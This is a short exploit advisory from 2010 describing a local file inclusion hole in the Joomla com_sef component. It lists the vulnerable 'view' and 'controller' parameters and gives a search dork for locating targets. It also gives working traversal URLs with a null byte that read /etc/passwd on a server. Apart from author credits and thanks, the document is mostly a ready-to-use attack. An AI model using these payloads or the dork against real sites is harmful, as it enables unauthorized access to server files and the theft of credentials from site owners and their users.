==========================================
Joomla Component com_sef LFI Vulnerability
==========================================
# Author: _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_sef.zip
# Version: 0
# Tested on: all OS
# CVE : 0
# Code : here
Joomla Component SEF (com_sef) - Local File Inclusion Vulnerability
#########################################################################################
[+] Discovered by : _mlk_ (Renan)
[+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
[+] Homepages : http://code.google.com/p/bugsec/
http://botecounix.com.br/blog/
http://c0d3rs.wordpress.com/
[+] Location : Porto Alegre - RS, Brasil
(or Brazil)
#########################################################################################
[-] Information
[?] Script : SEF (Search Engine Friendly)
[?] Home Script : http://www.joomla.com/
[?] Dork/String : "index.php?option=com_sef" / "com_sef"
[?] Date : 04, July 2010
-----------------------------------------------------------------------------------------
[*] Parameters vuls :
view
controller
-----------------------------------------------------------------------------------------
[*] Example :
http://localhost/index.php?option=com_sef&controller=[LFI]%00
http://localhost/[PATH]/index.php?option=com_sef&controller=[LFI]%00
-----------------------------------------------------------------------------------------
[*] Demo :
http://<server>/index.php?option=com_sef&controller=
../../../../../../../../../../../../../../../etc/passwd%00
#########################################################################################
[~] Agradecimentos :
Deus , Familiares , Amigos e Tricolor Ga?cho (Gr?mio) .
Em especial "m0nad" ( capitao caverna \o/ ) .
#########################################################################################
